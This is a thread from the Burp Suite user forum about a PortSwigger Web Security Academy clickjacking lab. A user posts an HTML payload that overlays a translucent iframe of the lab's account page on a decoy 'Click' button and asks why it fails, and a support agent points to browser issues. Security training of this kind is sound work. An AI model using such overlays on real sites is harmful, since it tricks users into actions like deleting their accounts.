Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Basic clickjacking with CSRF token protection

Jean-Maurice | Last updated: Jun 17, 2024 07:43AM UTC

I'm having trouble with this lab. When I click on 'View exploit' I have the login page coming up, of course with no 'delete' button. I'm using Burp's browser Chromium and here's my script, of course I'm changing the lab Id and keep the 'https://' : <style> iframe { position: relative; width: 1000px; height: 1000px; opacity: 0.5; z-index: 2; } div { position: absolute; top: 470px; left: 70px; z-index: 1; } </style> <div>Click</div> <iframe src="https://YOUR-LAB-ID.web-security-academy.net/my-account"> </iframe> I also tried with /my-account?id=wiener, for the same result. What am I doing wrong ? Thanks

Ben, PortSwigger Agent | Last updated: Jun 19, 2024 05:00AM UTC

Hi Jean-Maurice, There is currently an issue with using the Clickjacking labs in conjunction with Burp's embedded browser. You should, however, still be able to use a standard version of Chrome and get these labs to work - if you try a standard version of Chrome, alongside the written solution (adapted with the specific values required for your elements to line up), does this then allow you to solve this lab?

Jack | Last updated: Jul 17, 2024 07:40PM UTC

hi when can u fix this? it does not work with none of the browsers. Maybe accepting the solutions could be more dynamic for these labs because nothing works (chrome, burp browser, opera, edge, firefox, NOTHING)

Ben, PortSwigger Agent | Last updated: Jul 18, 2024 08:02AM UTC

Hi, Again, having run through this lab using a standard version of Chrome (version 126.0.6478.127) this lab still works with the written solution.

RM | Last updated: Sep 30, 2024 07:14AM UTC